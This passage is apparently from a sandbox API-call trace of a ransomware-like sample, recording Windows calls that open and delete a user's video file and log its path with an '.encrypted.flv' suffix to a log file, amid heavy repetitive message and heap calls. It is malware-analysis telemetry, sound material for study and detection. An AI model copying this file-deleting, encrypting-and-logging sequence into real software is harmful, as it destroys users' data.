hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.047] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.047] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.047] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\-23zp4gcog gf3iwx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0042.047] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.047] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.047] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.047] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.047] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.047] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.047] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.048] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.048] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.048] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.048] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.048] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.048] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.048] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.048] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.048] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.048] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.048] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.048] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv", lpFilePart=0x0) returned 0x41 [0042.048] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1996c6b0, ftCreationTime.dwHighDateTime=0x1d5b9f7, ftLastAccessTime.dwLowDateTime=0x44757480, ftLastAccessTime.dwHighDateTime=0x1d5c4c4, ftLastWriteTime.dwLowDateTime=0x18c41e20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6757, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="-23ZP4gcOG gf3iWX.flv", cAlternateFileName="-23ZP4~1.FLV")) returned 0x7c2100 [0042.049] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\-23zp4gcog gf3iwx.flv")) returned 1 [0042.050] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1996c6b0, ftCreationTime.dwHighDateTime=0x1d5b9f7, ftLastAccessTime.dwLowDateTime=0x44757480, ftLastAccessTime.dwHighDateTime=0x1d5c4c4, ftLastWriteTime.dwLowDateTime=0x18c41e20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6757, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="-23ZP4gcOG gf3iWX.flv", cAlternateFileName="-23ZP4~1.FLV")) returned 0 [0042.050] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.050] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.052] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.052] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.052] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.052] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.052] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.053] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.053] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.053] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.053] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.053] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.053] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.053] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.054] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.054] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3323, lpOverlapped=0x0) returned 1 [0042.055] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.055] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3323, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.055] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.encrypted.flv\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0042.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7f3688 [0042.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.encrypted.flv\r\n", cchWideChar=78, lpMultiByteStr=0x7f3688, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\-23ZP4gcOG gf3iWX.encrypted.flv\r\n", lpUsedDefaultChar=0x0) returned 78 [0042.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0042.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.056] WriteFile (in: hFile=0x140, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x4d, lpOverlapped=0x0) returned 1 [0042.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0042.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.056] CloseHandle (hObject=0x140) returned 1 [0042.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.058] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.058] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.059] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.059] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.059] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.059] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af608 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc40 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.060] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.060] RtlAllocateHeap (HeapHandle=0x770000, 